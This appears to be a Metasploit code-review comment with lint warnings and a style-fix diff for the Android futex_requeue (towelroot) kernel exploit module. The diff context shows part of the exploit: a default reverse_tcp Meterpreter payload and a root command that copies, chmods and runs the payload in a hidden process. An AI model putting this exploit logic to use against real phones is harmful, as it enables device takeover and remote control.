Msftidy on towelroot

````
modules/exploits/android/local/futex_requeue.rb - [ERROR] Exploit is missing a disclosure date
modules/exploits/android/local/futex_requeue.rb - [WARNING] Suspect capitalization in module title: 'futex'
modules/exploits/android/local/futex_requeue.rb - [WARNING] Suspect capitalization in module title: 'requeue'
modules/exploits/android/local/futex_requeue.rb - [WARNING] Suspect capitalization in module title: 'kernel'
modules/exploits/android/local/futex_requeue.rb - [WARNING] Suspect capitalization in module title: 'exploit'
modules/exploits/android/local/futex_requeue.rb:22 - [WARNING] Spaces at EOL
modules/exploits/android/local/futex_requeue.rb:26 - [WARNING] Spaces at EOL
modules/exploits/android/local/futex_requeue.rb:77 - [WARNING] Spaces at EOL
modules/exploits/android/local/futex_requeue.rb - [WARNING] Module contains old license comment, use tools/dev/resplat.rb <filename>.
````

Naughty. @bcook-r7 @timwr please to be using the msftidy pre-commit hooks :) tools/dev/pre-commit-hook.rb

--- a/modules/exploits/android/local/futex_requeue.rb
+++ b/modules/exploits/android/local/futex_requeue.rb
@@ -1,8 +1,6 @@
 ##
-# This file is part of the Metasploit Framework and may be subject to
-# redistribution and commercial restrictions. Please see the Metasploit
-# web site for more information on licensing and terms of use.
-#   http://metasploit.com/
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
 ##
 
 require 'msf/core'
@@ -16,14 +14,14 @@ class Metasploit4 < Msf::Exploit::Local
 
   def initialize(info={})
     super( update_info( info, {
-        'Name'          => 'Android futex requeue kernel exploit',
+        'Name'          => 'Android Futex Requeue Kernel Exploit',
         'Description'   => %q{
             This module exploits a bug in futex_requeue in the linux kernel.
-            Any android phone with a kernel built before June 2014 should be vulnerable. 
+            Any android phone with a kernel built before June 2014 should be vulnerable.
         },
         'License'       => MSF_LICENSE,
         'Author'        => [
-            'Pinkie Pie', #discovery 
+            'Pinkie Pie', #discovery
             'geohot', #towelroot
             'timwr' #metasploit module
         ],
@@ -41,7 +39,8 @@ class Metasploit4 < Msf::Exploit::Local
           {
             'PAYLOAD'  => 'android/meterpreter/reverse_tcp',
           },
-        'DefaultTarget' => 0
+        'DefaultTarget' => 0,
+        'DisclosureDate' => "May 03 2014"
       }
     ))
 
@@ -74,7 +73,7 @@ class Metasploit4 < Msf::Exploit::Local
     rootcmd += "cp " + payloadfile + " #{rootpayload} && "
     rootcmd += "chmod 766 #{rootpayload} && "
     rootcmd += "dalvikvm -Xbootclasspath:/system/framework/core.jar -cp #{rootpayload} com.metasploit.stage.Payload"
-    
+
     process = session.sys.process.execute(exploitfile, rootcmd, {'Hidden' => true, 'Channelized' => true})
     process.channel.read
   end

